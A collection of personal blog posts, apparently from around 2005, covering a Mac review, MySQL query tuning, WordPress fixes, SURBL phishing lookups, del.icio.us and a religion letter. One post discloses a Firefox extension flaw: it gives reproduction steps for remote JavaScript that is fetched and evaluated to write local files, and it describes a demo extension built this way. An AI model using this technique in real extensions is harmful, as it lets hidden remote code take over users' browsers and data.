Mleeka and I aren’t getting a divorce. We’re not even close. But occasionally, we’ll playfully suggest that if X, then I might have to pack up Lennie and go. It’s a joke. If you know us, don’t worry. So yesterday, Mleeka did the usual divorce joke, and Lennie and I worked out a deal that I think may have cinched her decision to go with me instead of with Mleeka.

First, we have to start weaning her off the magic boobies that fix any catastrophe, large or small. They’re definitely a must-have for now, and my proposition is essentially null until after the magic boobies are a luxury rather than an essential.

Once we clear that hurdle, we’ve decided to live in candy houses. At any given time, we’ll have six candy houses and a partial. We’ll build seven initially, and they’ll all be in a line, but Lennie will start munching the first as soon as we move in. The next day (I predict that Lennie will have a voracious appetite for candy), we’ll move into the next one in line because Lennie will have reduced the first to a shambles. Meanwhile, we’ll begin building another beyond the last one in the line. The next day, we’ll move into the next one and will build another. The end result, of course, will be that we’ll always have a yummy candy house and will get to travel the country together, but never with any great big single move that would be a hardship on Lennie from the vantage point of making friends, etc.

When I proposed this to her, she grunted and giggled and tried to eat my hand, and all of these things seemed to me to suggest that she dug the idea, so I think we’re a go if the need ever arises.

When I started my new job, I revamped my home office, which had been home to a rickety desk and stacks of books and papers all over the floor. For under $500, I got a big L-desk, a nice speaker phone, a printer stand, two beautiful wooden file cabinets, and a 6-foot bookshelf. I’ve got a pretty swank work space now. At my last job, people always joked that I was at sort of a Star-Trekkish command center because I had a flat screen monitor hooked into a Belkin port switcher that allowed me to use both a PC and my main Linux machine with just the one monitor/keyboard/mouse. I also had my laptop set up there, and all three systems were plugged into a little hub so that they could all get network from my one wall jack.

At home too I’ve got a little command center, with the laptop, a Linux box managing printing and poor-man’s samba backups under the desk, and a brand new Mac Mini sitting — get this — on my keyboard tray. The Mac is the newest addition and is a definite departure from the usual routine for me. I’ve been using Linux as a desktop OS for a couple of years and as a server platform for about five years, and I avoid PCs whenever remotely possible. Until this week, I had hardly touched a Mac in more than six years, when I did desktop support at UNC; we were on OS 7.x back then, and there have been a lot of changes. Some of my impressions about the Mac experience follow.

Setup. The system worked out of the box. Being a Linux user, I’m not exactly used to this. It took me a week of frustration to get the wireless, Synaptics touch pad, and wide screen monitor on my current laptop to work under Fedora Core 3. So I plugged in my Mac and it just worked. Today, I plugged my camera into a USB port to download the picture of the office, and as soon as I plugged it in, iPhoto started up and offered to download the images. No setup, none of the mounting of devices that I’m used to doing in Linux, no irritating system tray bubble telling me that a new device had been found and to click if I wanted more info.

Aesthetics. The Mac is a beautiful thing. Some of the default UI for applications like Safari that looks sort of like brushed metal I could do without, but the general tendency on the Mac is toward beauty. Smooth fades and slides as applications change state (focused or not), transparency of the docking bar, the crispness of the icons: These are all nice touches that make the OS a joy to use. Linux should aspire to the Mac aesthetic.

Speed. It may just be that I don’t have enough RAM (256M), but my Mac feels a little sluggish. Every Mac I’ve ever worked on felt a little slow to respond things. There was a time when Windows felt to me like it had the fastest-responding and most crisp UI going. Then XP with all its bloat and sluggishness came along, and newer versions of Linux came along that, to my mind, in most applications, topped Windows. My experience so far is that my Linux laptop is faster to work with than the Mac (part of the reason I write this from the laptop). Even with only 7MB of its 384MB free right now, my laptop is responding more quickly than the Mac, which has 62MB free.

Installing Applications. Installing applications on Windows has long been a strong point, I think. You click a setup file, and a wizard guides you through all the steps necessary to complete the installation. More and more Linux apps have a similar install procedure, though I find it about as easy to go to a command line and execute the few commands required to install most software packages (which process also happens to make you look really smart and dorky to bystanders, who watch with fascination as lines and lines of gobbledegook scroll up your screen). On the Mac, you download an install file, click it, and drag an icon from the resulting window into your Applications folder. If you launch the application straight from the icon, it sticks a drive icon for the app on your desktop, and this was sort of confusing at first, but once I figured out what was going on, I found this install process to be pretty intuitive. I suppose it lets you try an application before actually cluttering up your applications folder with it.

Finding Stuff. I’ve never found finding things on the Mac to be especially intuitive, though I guess it’s similar to the process on a Windows system. There’s always been this sort of abstract thing called the Finder that hasn’t seemed to be very useful. I’d expect to find here a list of open applications that allows me to toggle from app to app (it seems like this may have been part of the functionality years ago). OSX does have, I just now discovered, alt-tab functionality that allows you to toggle among open applications. When I last used a Mac with any regularity, I doubt I even knew about this feature on Windows systems. Again, the aesthetics of even this little piece of functionality are beautiful, with transparency, nice big icons, rounded corners, and a fade effect when it disappears. What the Mac does have now is a dock that displays pretty clearly what applications you use most frequently, which ones are open, and which ones you’ve minimized. The dock can be moved to either side or the bottom of your screen, and you add things to it by dragging to it, removing them by dragging them to the trash. As far as finding files, there’s a find dialogue, but because OSX has FreeBSD running under the hood, you can also use standard find syntax (”find /Users -name office.jpg”) at the command line. All in all, though the ways of getting at applications and files on the Mac is a little different from what I’m used to, I could get used to it and haven’t found it to be a problem. One really cool feature the Mac ships with is Exposé; if you hit F9, all your open applications are tiled nicely on your screen so that you can see what’s running and click the window you want to give focus to. This sort of replaces the Windows/Linux task bar feature that labels each window for you, and it’s actually much better because it gives you a visual representation rather than text in your taskbar, of which text less and less is visible as you open more and more things.

Window Size. This is the biggest strike against the Mac, in my opinion, and it may well be that there’s a setting that lets you get around it. Mac windows have three little bubbles in the upper left-hand corner, a red, a yellow, and a green one. Clicking the red one closes a window or application. Clicking the yellow one minimizes it (which on the Mac makes it disappear from the screen and puts an icon in a separated area of the dock). Clicking the green one seems to maximize the width of the window and to extend the bottom border down to the top of the dock; clicking it again toggles back to the original view. I happen to be greedy for window space. I want my windows to take up the full window so that I can maximize my viewing space. This is especially important in text editors, such as vi, that I use to write code; I need all the horizontal and vertical space I can get so that I can read the maximum possible amount of code. Windows and Linux have spoiled me in this regard because their windows automatically epand to use all space but the sliver of task bar. The dock on the Mac is pretty big, and I lose nearly an inch of vertical space at the bottom of my 17-inch monitor and another quarter inch at the top even when I maximize. Now there are options associated with the dock. You can make it pretty small, and you can set it to disappear when you’re not moused over the area it’s set to occupy. When you set it to disappear, maximizing windows works pretty much as it does under Windows and Linux. But here the aesthetics and the simple functionality of the dock foil you. First off, the dock is a gorgeous piece of UI, and I hate to see it go. Second off, it’s functional insofar as it displays up arrows under each open application and displays in a section on the right which apps are minimized. Additionally, if an application needs your attention (as when somebody tries to initiate a chat in iChat), the application’s icon bounces. So it’s a very functional piece of UI as well, and it’s reassuring to have it down there. I suppose there’s really not a win here. It’s just a matter of personal preference, and I can’t really fault Apple for providing me various options that I’m too finicky to combine in a fully pleasing way. Let’s not call this a strike against the Mac so much as a conundrum its elegance causes that the lack of much in the way of choice in Linux and Windows makes all the more painful.

Administration. I spent probably an hour off and on yesterday trying to get Mleeka’s Windows system to connect to my samba server. I got it to connect, but it didn’t have write access. I finally did get it to use the samba server for printing. But it was a major headache and involved much swearing and waiting for sluggish Windows UI and network, and I finally gave up on the file sharing part. If I knew how to administer a Windows system using simple command line utilities and configuration files, I would have been much happier. Linux is by and large a cinch to admin because it’s simple. There are graphical tools for administering the Mac, but if I ever get lost or frustrated, I can, in many cases, open up a terminal window and find myself at the familiar command line, where I can do simple administration with no headache. To connect my Mac to my samba server, I had only to type “/sbin/mount_smbfs -T 10 //username:password@192.168.1.102/photos /Users/photos” and I was connected, with a drive on my desktop and full read/write capability.

By and large, I’m digging my Mac so far. I ordered the iSight camera, which facilitates pretty darned high-quality video-conferencing with other iChat users who have the camera. That is in fact the primary reason my company bought me the computer. If the system were a little faster, I’d be more inclined to use it as my primary system. Also, if there were more open source software for it that could be installed reasonably easily (maybe there is and I just don’t know about it yet), I’d be happier. I considered trying to install Gimp yesterday because I don’t know of any more advanced free graphical editors for the Mac and because I’m comfortable using Gimp, but it was going to be a real pain, so I didn’t. I haven’t even looked to see if Open Office is supported on the Mac. If it is, I’ll definitely install that. If you’ve got some cash burning a hole in your pocket and are intrigued by Macs, I’d definitely recommend trying one out, especially if you’re tired of Windows but reluctant to toss yourself into the wilds of Linux.

I have a stack of 10 or so issues of Reader’s Digest on the back of my toilet. Last night, intrigued by a table-of-conetnts blurb about protecting your data, I flipped to a section called “RD Technology” and read, among others, the following recommendation:

Change Web Browsers
Viruses that enter your PC via Internet Explorer can do serious damage, says [an unidentified] Poor. He recommends you consider trying a free alternative such as Firefox, available at mozilla.org.

I decided to go ahead and upgrade my WordPress to 1.5. This is driven partially by reports that my Amazon plugin quit working in 1.5 and partially because I wanted to see if the comment spam measures were improved. Some time back, I essentially eliminated comment spam by adding captcha to my form, but the other day, I started getting hit with trackback spam. We’ll see if this works. It’s a pretty easy upgrade.

I’ve updated the Amazon plugin to work with WordPress 1.5. The plugin uses a class called “Snoopy” to connect to Amazon, and this, it turns out, as been added as a class in the core WordPress code. So when I redefined it in my plugin, it was causing a problem with the Dashboard, which was trying to reinclude the class. The fix (thanks to George for beating me to the punch on diagnosing the problem and sending in a fix) can be downloaded here. The changes included deleting the Snoopy class definition and requiring snoopy-class.php from wp-includes.

I’m currently reading High Performance MySQL as part of an effort to compare MySQL and PostgreSQL. The book has proven most informative so far. Rather than just giving the basics of how to use MySQL, which I’m very familiar with, it goes into enhancing query performance and tweaking the server configuration to maximize what MySQL can do for you. Having been introduced to MySQL the way I was — by just jumping in as sort of a n00b programmer with no clue what I was really doing — these are the sorts of things I never found time, gumption, or particular need to learn. Most of the programs I wrote scaled pretty well (or had no need to scale) without a lot of performance tweaking. But for Spread Firefox and for my new job, I have written and will be writing some much higher-end stuff with scalability to hundreds of thousands of users in mind. So I figured it was time to read up on some of the more advanced topics in MySQL. Chapter 5 of High Performance MySQL, it turns out, is the most useful piece of geek writing I can recall ever having read. This chapter alone is worth the $40 price tag on the book (it’s actually only $26.37 through Amazon).

I read about half the book yesterday but didn’t get a chance to apply any of the takeaways in a real life situation. Today, I was glancing at some comments on sfx and saw someone asking that we reinstate the “Top 5 blog posts” block. I didn’t know it had gone away. Sure enough, though, the header was there, but no content existed. So I checked the query, and when I ran it, I got a query error, which seemed odd, as it had been working just recently, and I hadn’t changed the query. Ah, but we changed database servers, and the newer one had a newer version of MySQL. My query stupidly used the “mod” keyword as a table alias, and when I fixed that, the query error went away. But the query, which has always taken awhile because it’s calculating ratings for potentially thousands of posts and ordering them to get the top 100 (which I later apply another little algorithm to to get the top 5), took long enough that I interrupted it and decided I’d see if I could find a way to optimize it. When I say it took long enough, I don’t mean that it took three seconds rather than .0002; I mean that I killed it after 10 or 20 seconds.

To get an idea of just how MySQL optimizes and runs a given query, you use the “explain” keyword followed by the query you want to investigate. For each table the query has to hit, explain displays several pieces of information. Probably the easiest to zoom in on and the one that’ll be the most impressive for this example is how many rows the optimizer estimates it’ll have to read in order to get the results. In the output below, you’ll see that the query will have to look at 5602 rows in the “node_mod” table (aliased to “mymod” and formerly to the problematic “mod”; this table contains a list of which of the site’s posts have been moderated by users). This is a full table scan (I can tell this by looking at the “type” value and seeing “ALL”), which isn’t very efficient. For the “node_mod_user” table (aliased to “u” and listing the ratings given by each user to site posts), the optimizer estimates that it’ll have to scan 27081 rows. Again, this is a full table scan, which is less efficient the more rows you have. And finally, the “node” table (which contains posts) has one reference per iteration of the query. Here’s the output from explain:

mysql> explain SELECT node.nid, node.title, FROM_UNIXTIME(created) as date,
mymod.value as val, count(*) as cnt, (mymod.value/count(*)) as rating
FROM node, node_mod as mymod, node_mod_users as u
WHERE node.nid=mymod.nid
AND node.nid=u.nid AND created >= (UNIX_TIMESTAMP(NOW()) - (86400 * 7)) AND promote != 1 AND type != 'image'
GROUP BY node.nid ORDER BY rating DESC, created DESC LIMIT 100 G

*************************** 1. row ***************************
           id: 1
  select_type: SIMPLE
        table: mymod
         type: ALL
possible_keys: NULL
          key: NULL
      key_len: NULL
          ref: NULL
         rows: 5602
        Extra: Using temporary; Using filesort
*************************** 2. row ***************************
           id: 1
  select_type: SIMPLE
        table: u
         type: ALL
possible_keys: NULL
          key: NULL
      key_len: NULL
          ref: NULL
         rows: 27081
        Extra:
*************************** 3. row ***************************
           id: 1
  select_type: SIMPLE
        table: node
         type: eq_ref
possible_keys: PRIMARY,node_type,node_promote_status
          key: PRIMARY
      key_len: 4
          ref: spreadfirefox.mymod.nid
         rows: 1
        Extra: Using where
3 rows in set (0.01 sec)

The red flag this raised for me was that I shouldn’t have to do a full table scan on the nod_mod table. It turns out that I hadn’t added an index on this table for the nid field, and by doing so, I eliminate in my query the need to do a full table scan. Sure enough, I added the index, and the query returns almost instantly now (in .44 seconds rather than too many seconds to even bother waiting). Take a look at the new explain output below. Rather than doing a full table scan of 5602 rows, we’re using the new index, and it has a significant positive effect on performance.

mysql> explain SELECT node.nid, node.title, FROM_UNIXTIME(created) as date,
mymod.value as val, count(*) as cnt, (mymod.value/count(*)) as rating
FROM node, node_mod as mymod, node_mod_users as u
WHERE node.nid=mymod.nid
AND node.nid=u.nid AND created >= (UNIX_TIMESTAMP(NOW()) - (86400 * 7)) AND promote != 1 AND type != 'image'
GROUP BY node.nid ORDER BY rating DESC, created DESC LIMIT 100 G

*************************** 1. row ***************************
           id: 1
  select_type: SIMPLE
        table: u
         type: ALL
possible_keys: NULL
          key: NULL
      key_len: NULL
          ref: NULL
         rows: 27079
        Extra: Using temporary; Using filesort
*************************** 2. row ***************************
           id: 1
  select_type: SIMPLE
        table: node
         type: eq_ref
possible_keys: PRIMARY,node_type,node_promote_status
          key: PRIMARY
      key_len: 4
          ref: spreadfirefox.u.nid
         rows: 1
        Extra: Using where
*************************** 3. row ***************************
           id: 1
  select_type: SIMPLE
        table: mymod
         type: ref
possible_keys: nid
          key: nid
      key_len: 5
          ref: spreadfirefox.node.nid
         rows: 1
        Extra: Using where
3 rows in set (0.10 sec)

After making this change and starting to write this triumphant blog entry, it occurred to me to check and see if I had indexed the node_mod_users table, and it turned out that I hadn’t. When I added an index on nid, it increased performance even more, cutting my query time down to .10 seconds and resulting in the following output from explain:

mysql> explain SELECT node.nid, node.title, FROM_UNIXTIME(created) as date,
mymod.value as val, count(*) as cnt, (mymod.value/count(*)) as rating
FROM node, node_mod as mymod, node_mod_users as u
WHERE node.nid=mymod.nid
AND node.nid=u.nid AND created >= (UNIX_TIMESTAMP(NOW()) - (86400 * 7)) AND promote != 1 AND type != 'image'
GROUP BY node.nid ORDER BY rating DESC, created DESC LIMIT 100 G

*************************** 1. row ***************************
           id: 1
  select_type: SIMPLE
        table: mymod
         type: ALL
possible_keys: nid
          key: NULL
      key_len: NULL
          ref: NULL
         rows: 5604
        Extra: Using temporary; Using filesort
*************************** 2. row ***************************
           id: 1
  select_type: SIMPLE
        table: node
         type: eq_ref
possible_keys: PRIMARY,node_type,node_promote_status
          key: PRIMARY
      key_len: 4
          ref: spreadfirefox.mymod.nid
         rows: 1
        Extra: Using where
*************************** 3. row ***************************
           id: 1
  select_type: SIMPLE
        table: u
         type: ref
possible_keys: nid
          key: nid
      key_len: 5
          ref: spreadfirefox.node.nid
         rows: 5
        Extra: Using where; Using index
3 rows in set (0.00 sec)

Note that the optimizer is once again doing a table scan of the roughly 5600 rows of node_mod. This is because MySQL can use only one index for a given query. In this case, with the nid column indexed in both node_mod and node_mod_users, it chooses the better of two options and does a table scan of the table with 5600 rows rather than the one with 27081. That’s 4 - 5 times fewer rows to scan, and our performance increased by a factor of about 4 (from .44 seconds to .10). Makes sense, huh?

The lesson here is pretty obvious. If you’ve got a slow query, explain it to see exactly how MySQL is processing it. Explain can expose, among other things, careless indexing problems that can make a very real difference in how your program executes.

A few months ago, I created the following bug report at the Mozilla project’s install of Bugzilla:

User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0

It’s possible to use XMLHttpRequest to retrieve the text from a remote javascript file and then to eval that text and execute the javascript within a local scope. This circumvents the need to sign remote scripts and can be done without enabling UniversalXPConnect. In theory, one would simply suggest that application developers be careful not to write code that would execute arbitrary remote javascript, but this doesn’t account for malicious coders who might make extensions available, for example, and use them to tamper with the users’ machines. It may be that this is a jslib issue and not a Gecko issue, but I wasn’t sure where else to report it.

Reproducible: Always
Steps to Reproduce:
1. Install jstest package (attached).
2. Edit xul.js (in zip file), replacing the second parameter to the “save()” call to a local file on your system (or to a file that doesn’t exist yet in a writable directory).
3. Place xul.js (in zip file) on a remote server.
4. Edit the button in jstest.xul within package so that the parameter to “execute()” in the “oncommand” parameter points to the file created in step 2.
5. Run the package and press the button.
Actual Results:
A file is written to the local path specified in the remote script containing the text sent as the first parameter to the remote “save()” function.

Expected Results:
No unsigned remote javascript should be able to perform certain actions, such as local file operations.

In plain English, it means that installing Firefox extensions can be dangerous if you’re not very careful about what you install. When you install an extension, you’re giving full control of your browser to the developer who wrote the extension. In most cases, this’ll work out just fine, as most people who write extensions are writing utilities that they find useful and wanted to make available to others. But there’s always the jerk who ruins a good thing. Later in the bug report, I go back and forth with a key developer about whether or not this is in fact a bug. He concludes that it’s not. In short, if you agree to install an extension, you agree to take whatever pain or pleasure comes with installing that extension, and it’s a bad idea to install untrusted extensions. And of course he’s right. The extension system has to have pretty much full privileges or else it’ll be rendered essentially useless. So the credibility of Firefox as a secure browser is in some ways in the hands of users, who are known for installing spyware on their systems through IE and can’t really be trusted to keep security in mind.

To illustrate the point, I’ve written a little test extension named Prawn (as in shrimp) that shows you prawnography on demand. The real life example, of course, would showcase pornography and would be more fully-featured than my extension. Prawn adds an item to your “Tools” menu named “Prawn me” that, when selected, spawns a new tab loaded with a random racy image from prawnography.net. The extension also has an annoying habit of popping up a window every 30 seconds or so. It’s ok to download and try my extension — I promise it doesn’t do anything truly malicious, and it shows the point pretty well, I think. If you happen to be a prawn fetishist and you see this great extension that gives you access to prawnography, you might carelessly download this extension and find yourself stuck with annoying popups. Moreover, if the popups don’t indicate that they’re associated with the Prawn extension, you might not be able to figure out how to make them stop, short of reinstalling Firefox (though all it in fact takes is uninstalling the extension).

The real dirty thing about my extension is that it doesn’t merely do a popup. It in fact downloads a remote text file and evaluates the code in that file as javascript. So a particularly sneaky developer could write an extension that, the first few days it’s loaded, does expected and harmless things but that begins after a while to do popups or other unsavory things (writing files to your system, for example, or sending cookies or information about your browsing habits back to a central server). This method renders it more difficult to associate the activities with the extension in question. My little Prawn extension effectively gives complete control of your browser to me. I could program it to close your browser upon startup so that you never even have the chance to uninstall it (unless you know what text files to edit by hand to do so). Can anybody see Microsoft covertly putting out a similar extension in order to frustrate Firefox users and drive them back to IE? The really scary thing is that because the extension executes remote code, I can change its behavior at any time I want without your having to modify your local copy; so it can start out as a friendly extension and morph into something ugly and destructive.

The moral here isn’t that Firefox is bad or insecure, though the argument could be made. I’ve spoken to Firefox developers who point out that the extensions manager instructs users not to install untrusted extensions, and I suppose that’s valid, though we all know that it’s absurd to trust users to follow instructions. (In spite of my warnings about not installing untrusted extensions, did you download and install mine? If so, shame on you. It really is safe, but what if somebody else wrote a similar blog posting with their own extension that actually turned out to be malicious?) Developers and advocates also point out that one of Firefox’s big strengths is that it doesn’t run ActiveX controls, which are responsible for most of the malware that’s out there. And that’s true and good. But if a similarly exploitable technology is built into Firefox, is it really that much better?

Well, I think it is. I’m a devoted Firefox user, and I encourage everybody I can to use the browser. But I also encourage them to be sensible about what extensions they add to Firefox. Theoretically, the extensions available at update.mozilla.org are safe, but I don’t know how much scrutiny is actually given to extensions before they’re added there. (There may be a great deal of scrutiny; I’m not saying there’s not; I’m just saying that I don’t know.) And I don’t know how much code review is done. Is it possible, I wonder, to submit and have approved a cool extension but then to go back and edit it without review a few months later so that it includes malicious code?

Questions like this are no doubt being asked as the Mozilla Foundation works even now on revamping update.mozilla.org, but they’re probably too technical and uninteresting to many, if not most, members of the growing pool of Firefox users. And debatably, they’re questions that users shouldn’t have to worry about. In an ideal world, you’d just install your browser and use it without looking back. The jerks out there who make malware will always find ways to thwart this ideal vision, I suspect. My advice, then, is to use Firefox (right now, it is safer than IE; if you don’t use Firefox, consider Opera or some other alternative). I also advocate spreading Firefox, an activity I’ve been engaged in for six months now. But don’t be blind to the shortcomings that the greatness of Firefox extensibility introduces. Try to verify that any extensions you install are safe. And whatever you do, if you need to browse prawnography, don’t use my extension to do so; you’ll find it most annoying, if (for now) technically harmless.

It sounds like a belch you’re trying to suppress, but SURBL is actually a pretty cool spam/phish-blocking tool. I think “phishing” is probably a term familiar primarily to tech weenies, so I’ll give here the description provided at antiphishing.org: “Phishing attacks use ’spoofed’ e-mails and fraudulent websites designed to fool recipients into divulging personal financial data such as credit card numbers, account usernames and passwords, social security numbers, etc.” In other words, all those emails you get from PayPal and Citibank and other financial organizations you have no affiliation whatsoever with telling you that you need to log in and provide your credit card number in order to avoid fraud are in fact from fraudulent sites. You can read more on phishing (and pretty much anything else) at WikiPedia.

Surbl.org provides a pretty cool system for testing whether or not sites are phishing sites. The system uses DNS to offload lookups onto an existing robust distributed network that’s pretty much never going to be down. This keeps surbl.org from having to maintain their own huge infrastructure to manage all the traffic they stand to get. The basic mechanism is that when you’ve found a possible phishing site (a link in a questionable email, for example), you prefix the domain to one of several possible surbl.org domains. For example, sc.surbl.org does a lookup against SpamCop’s blocklist database. Probably the most useful surbl.org domain is multi.surbl.org, which appears to aggregate results from all the lists. So for example, if I get an email with xxx.yyy.com listed as a domain, I’d do a lookup on xxx.yyy.com.multi.surbl.org. If the query returns an NXDOMAIN result, the domain’s not on any of the lists. If it returns an IP (it’ll be a 127.0.0.* IP), it’s on one of the lists and should be considered not fit for consumption. Of the following two queries I ran, the first isn’t listed as a phishing site, but the second one is:

[houston@localhost daryl.learnhouston.com]$ nslookup confirm.keydataonline.net.multi.surbl.org
Server:         69.1.30.34
Address:        69.1.30.34#53

** server can't find confirm.keydataonline.net.multi.surbl.org: NXDOMAIN

[houston@localhost daryl.learnhouston.com]$ nslookup 80.248.127.210.multi.surbl.org
Server:         69.1.30.34
Address:        69.1.30.34#53

Non-authoritative answer:
Name:   80.248.127.210.multi.surbl.org
Address: 127.0.0.12

If you’re testing an IP address (phishing emails often use these rather than domains but mask the IP in the status bar so that it actually looks to less savvy users as if the link is pointing to a valid site), you have to reverse it before sending the query. The actual IP address that appeared in my email for the query above was 210.127.248.80.

Of course, this isn’t very practical or user-friendly. Even as a pretty savvy user, I’m not going to go do this query before reading each suspicious email (luckily, I have a pretty good nose for phish anyway), and, surely, less savvy users can’t be expected to use a tool like nslookup to do these queries. The info is provided really for those who would write tools to tap into it and make reading email safer. An enterprising programmer might write an extension for Thunderbird, for example, that does this lookup for any links in an email and changes the appearance of the email if a positive result is returned so that it’s obvious that the email is a phishing attempt.

When I first began reading about the mechanism surbl.org provides, I thought it seemed awfully clunky and sort of jury-rigged. And in a way, it is. But it’s also ingenius in its piggybacking on top of DNS, and as scalability is one of my hot issues right now, I found this very interesting.

I’m pretty sensitive to the fact that some of my beliefs brush up rather harshly against some of the beliefs of a few people who probably read me from time to time, and so I’m reluctant at times to post on certain topics. Or, really, one topic: Religion. It’s not that I’m in any way ashamed of my beliefs; I just don’t want to hurt the feelings of anybody close to me whose feelings would be hurt by some of my opinions. This post could possibly hurt feelings. Fair warning.

The following letter to the editor appeared in an area newspaper (one that I actually used to be a copy editor and layout guy for):

It is beyond my understanding that anyone with just the slightest intelligence could believe that there is no creator of all things. I would think that such a person would be too embarrassed to reveal such stupidity.

Let’s look at a few things. The person who invented the camera for example, truly did a marvelous job. A mechanism that with its lenses and shutter could capture a picture of an object. Man is praised for his ability to create such a marvelous thing. All the work involved to figure it out and build it. But with the human eye, well it just happened.

I was in Townsend a while back and saw some paintings from one of the local artists. The details in the picture would captivate any one. It took lots of thought and imagination to paint such a fine picture. Did it just happen or did someone design it?

Computers are a very great invention. The human brain has devised a wonderful electronic one. But the human brain? Well it just happened.

Even in nature it is so amazing with all its diversity and complexity. How is it a humming bird does what he does? It is so much different from other birds. All the birds are different from each other. You would think somewhere along the line since they just happened that some birds would be a little mixed up. How is it possible that a little acorn becomes a mighty oak? All the branches, twigs, leaves all came from the DNA that was in the little acorn seed. All the different varieties of trees just happened? All grasses, weeds which differ so much, they were never designed, they all just happened. What ignorance! Lets think for a moment of the little insignificant watermelon seed. It goes into the ground, dies, and out from it is a huge vine and the vine produces a watermelon which has a green cover, a white rhine and a red inside full of water for man’s enjoyment. Same with corn and all seeds.

Have you ever wondered why it is that all the fruits and vegetables are just the right size for humans to eat? An apple or carrot can be so easily held in the hand. Why isn’t there a few potatoes or oranges as big as houses? All the things we eat are just right in size for our consumption. Just happened huh?

All you folks who say there is no creator who made all these things are showing off absolute stupidity. Your problem is that you don’t want to have to answer to your maker so are free to do whatever you like.

Kinda reminds me of the fellow who went to his medicine cabinet and picked out a product that read, “Poison.” But he didn’t believe it would kill him so he drank it and he died. It doesn’t matter whether or not you believe something. What matters is that truth is truth and regardless of what you believe, truth will stand. You who don’t believe in a creator with whom you must give an answer to one day. That doesn’t change the truth. Not only will you answer to him but every knee shall bow and every tongue confess that Jesus Christ is Lord to the glory of God the Father.

“The fool has said in his heart, there is no God.”

Aside from the fact that the speaker’s letter isn’t very Christian in its approach to those he’s criticizing (he must not have read Matthew 5:22, which says that anybody calling somebody a fool is in danger of hellfire), he’s simply got his facts wrong. Nobody on my side of the fence suggests that the human brain “just happened.” In fact, it took years and years of minor random changes and natural selection for the useful changes for the human brain to evolve to its current pretty darned nifty state. In my opinion, this is much more complexly beautiful than the notion that the human brain was created with a zap and an incantation by any god. But that’s just one flaw with his argument. This letter really struck a nerve with me, and so I drafted my own and sent it off the the editor of the paper that published this gentleman’s tirade. The text of mine follows:

In a letter entitled “Believing is choice” published on Feb. 18, the writer expresses his astonishment that anyone could believe that all the wonderful things of this earth could have come about without the work of a divine hand. His argument seems to be that great things cannot happen spontaneously; there must be a designer, and (by extension) the greater and more complex the item in question, the greater its support for the existence a creator must be. The obvious question, then, is how great a being must exist to have created so great a god. And how great a being to have created that god. And so on. The argument simply doesn’t hold together when you remove the convenient assumption that God Himself has no creator, which assumption undermines the foundation of the whole argument, rendering it not only unsound but utterly absurd.

The writer notes as further proof of a grand design that fruits and vegetables are the perfect size for human beings to hold in their hands and eat. But what about watermelons, which are too large for my mouth? What about cocoanuts, which are rough on the teeth? Why, if the divine plan is so well-thought-out, do edible animals flee when we hunt them rather than falling onto our plates fully cooked and seasoned upon the first hint of our hunger? I once tried to eat a sperm whale in one bite and was unable to manage it in spite of God’s perfect design. Why do our joints wear out and why are we so susceptible to the illnesses inflicted upon us by tiny microbes? Why do our teeth have to fall out and regrow when we’re young rather than growing with us like the rest of our bodies? Why do we need glasses and hearing aids? Why is it possible for us to swim but not to fly? Why are babies born with holes in their hearts and with twins attached to them at the head and missing the hands God designed carrots and oranges to be held so easily in? Are these children God’s rough drafts? Is God not so perfect after all?

A more plausible answer seems to me to be that they’re not the rough drafts of some halfwit god but are products of an unfeeling mechanistic natural process. Anyone who would worship the careless and haphazard (or just plain cruel) god represented by the facts the letter-writer leaves out quite possibly deserves whatever that god decides tomorrow to inflict upon him.

If you haven’t heard of del.icio.us, chances are that you’re not missing much. It’s a bookmark management tool that appeared late last year and that promotes community or collaborative bookmarking, with the bookmarks stored remotely. Further, it’s a big of a shift in the approach to bookmarking: Rather than putting a link in a folder as we’re all used to doing, you apply tags to links, and you can apply as many tags as you want to. This makes for one-to-many categorization without the redundancy of bookmarking something many times, one instance per bookmark category. It also implicitly allows for tiered organization. For example, I’ve spent most of the day googling around for information about two major open source database management systems, postgresql and mysql. I’m trying to collect a whole bunch of data about both servers so that I can make a decision about which to use for a big project I’m working on. Because I got really tired of the bookmark interface and the pain it becomes to categorize things, I started tossing my links into my del.icio.us profile. All results I tagged “database.” Postgresql-specific links I also tagged “postgresql,” and mysql-specific links I additionally tagged “mysql.” Sites relevant to both databases (such as feature-comparison sites) I applied all three tags to.

So far, this probably seems very little different from regular old bookmarking except that the interface has changed. The beauty of it all comes together, though, when you consider the handy fact that you can get at your links via RSS, which can be read in a news reader, displayed as bookmarks in Firefox, parsed in a MediaWiki plugin for display in an article, and so on. By using del.icio.us to store and tag my bookmarks, I’m actually making them very portable. Del.icio.us’s RSS API is very simple and elegant in that it allows you by simply using a correctly-formatted URL to get only the subset of links you want to see. Here are some examples:

• http://del.icio.us/rss/tag/database shows me an RSS feed of all links across the system tagged “database”
• http://del.icio.us/rss/daryl/database shows me an RSS feed of just my links tagged “database”
• http://del.icio.us/rss/daryl shows me an RSS feed of all of my links
• http://del.icio.us/daryl/database shows me an HTML page of all my links tagged “database”
• http://del.icio.us/daryl/postgresql shows me an HTML page of all my links tagged “postgresql”
• http://del.icio.us/daryl shows me an HTML page of all my links

So del.icio.us provides not only an online interface for managing and viewing your bookmarks, but also an alternate format for the links that allows you to plug them into pretty much any RSS-enabled system you want to. This is very cool.

But, as I said at the beginning, if you’re not familiar with del.icio.us, you’re probably not missing much. Chances are that you’re bookmarking things and getting along just fine, and the minor shift in mechanism and presentation seems trivial. Even I felt this way until just today. I thought del.icio.us was sort of a pain to use and didn’t want to have to login to a site to get my bookmarks. But as I started combing through sites about postgresql and mysql and bookmarking them, I found the interface for categorizing the bookmarks to be cumbersome and irritating, and I began to think that I’d probably never even bother to go digging through the bookmarks to find the links. Or I’d have to double-bookmark things to categorize them into multiple applicable folders, and it’d all become very hairy to manage and use. So I tried using del.icio.us, and when you add the popup to your link bar in Firefox, it’s really much simpler to use than the bookmark interface. And when you happen to be a developer who can tweak posts in your MediaWiki extranet to consume RSS feeds and use them to display links, del.icio.us starts to look much more attractive. I’m a convert.

Extisp.icio.us is a nifty visual representation of your del.icio.us tags that changes the font size for tag listings to show which are your most oft-used tags. It has no real practical use, but it can be fun to compare your tags to those of friends and hardcore del.icio.us users (see for example the difference between a couple of my colleagues, one of whom is a reluctant user like me and one of whom is verging on being psychotic about tagging his links). You can see my tags here. Not surpirsingly, postgresql and database are the most prominent tags, with mysql coming in third place.